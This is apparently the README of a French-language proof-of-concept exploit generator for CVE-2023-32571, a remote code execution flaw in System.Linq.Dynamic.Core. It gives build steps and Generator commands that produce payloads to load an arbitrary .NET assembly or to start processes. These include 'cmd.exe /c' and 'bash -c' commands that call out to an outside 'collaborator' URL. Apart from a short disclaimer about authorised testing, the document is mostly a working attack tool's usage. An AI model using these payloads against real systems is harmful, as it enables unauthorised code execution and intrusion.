
Preuve de concept pour CVE-2023-32571
Preuve de concept pour CVE-2023-32571, une vulnérabilité d'exécution de code à distance dans System.Linq.Dynamic.Core (versions 1.0.7.10 à 1.2.25). Cette vulnérabilité permet aux attaquants d'exécuter du code et des commandes arbitraires lorsque des entrées non fiables sont analysées par des méthodes telles que Where, Select, OrderBy.
Cet outil est fourni uniquement à des fins éducatives et de test autorisé. L'utilisation de cet outil pour attaquer des cibles sans consentement mutuel préalable est illégale. Les développeurs déclinent toute responsabilité et ne sont pas responsables de tout usage abusif ou de tout dommage causé par ce programme.
dotnet build --configuration Release
Payload/bin/Release/netstandard2.0/Payload.dllGenerator/bin/Release/net9.0/Generator.dllL'outil prend en charge deux modes :
# Utilisation du codage Base64
./Generator --mode 0 --file Payload.dll --type Payload --parameters "\"<votre-url-collaborateur>\"" --encoding 1
# Utilisation du codage Hex
./Generator --mode 0 --file Payload.dll --type Payload --parameters "\"<votre-url-collaborateur>\"" --encoding 0
# Utilisation du codage Base64
Generator.exe --mode 0 --file Payload.dll --type Payload --parameters "`"<votre-url-collaborateur>`"" --encoding 1
# Utilisation du codage Hex
Generator.exe --mode 0 --file Payload.dll --type Payload --parameters "`"<votre-url-collaborateur>`"" --encoding 0
# Exécution de commande Windows
./Generator --mode 1 --parameters "cmd.exe /c ping <votre-url-collaborateur>"
# Exécution de commande Linux
./Generator --mode 1 --parameters "bash -c ping <votre-url-collaborateur>"
--mode : Mode d'exploitation (0=AssemblyLoad, 1=ProcessStart)--file : Chemin vers l'assembly .NET à charger (obligatoire pour le mode AssemblyLoad)--type : Nom de type qualifié complet à instancier (obligatoire pour le mode AssemblyLoad)--parameters : Paramètres selon le mode :
--encoding : Méthode de codage pour le mode AssemblyLoad (0=Hex, 1=Base64)